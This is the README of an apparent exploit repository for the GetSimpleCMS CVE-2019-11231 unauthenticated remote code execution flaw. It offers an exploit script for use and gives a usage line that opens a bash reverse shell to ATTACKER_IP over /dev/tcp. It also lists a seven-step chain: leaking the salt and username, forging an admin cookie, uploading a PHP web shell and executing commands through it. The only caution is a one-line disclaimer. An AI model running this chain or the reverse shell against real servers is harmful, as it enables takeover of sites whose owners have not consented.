# GetSimpleCMS CVE-2019-11231 RCE Exploit

![Python](https://img.shields.io/badge/python-3.x-green) ![CVE](https://img.shields.io/badge/CVE-2019--11231-red)

Unauthenticated Remote Code Execution exploit for GetSimpleCMS ≤ 3.3.15

## Vulnerability

GetSimpleCMS exposes sensitive files publicly (`/data/other/authorization.xml`, `/data/users/`) allowing attackers to:
1. Leak API keys and usernames
2. Forge authentication cookies
3. Obtain CSRF tokens
4. Upload and execute arbitrary PHP code

**CVSS Score:** 9.8 (Critical)

## Usage

```bash
pip install -r requirements.txt
python3 exploit.py http://target.com "id"
python3 exploit.py gettingstarted.htb "whoami"
python3 /tmp/test.py gettingstarted.htb "/bin/bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'"
```

## How It Works

1. **Enumerate version** → GET `/admin/`
2. **Leak salt** → GET `/data/other/authorization.xml`
3. **Get username** → GET `/data/users/`
4. **Forge cookie** → SHA1(username + salt)
5. **Get nonce** → GET `/admin/theme-edit.php`
6. **Upload shell** → POST `/admin/theme-edit.php`
7. **Execute commands** → GET `/theme/shell.php?cmd=...`

## Files

- `exploit.py` - Main exploit script
- `requirements.txt` - Dependencies (requests, beautifulsoup4)

## Disclaimer

⚠️ **Educational purposes only.** Only test on systems you own or have permission to test.

## References

- https://ssd-disclosure.com/archives/3899/ssd-advisory-getcms-unauthenticated-remote-code-execution
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11231
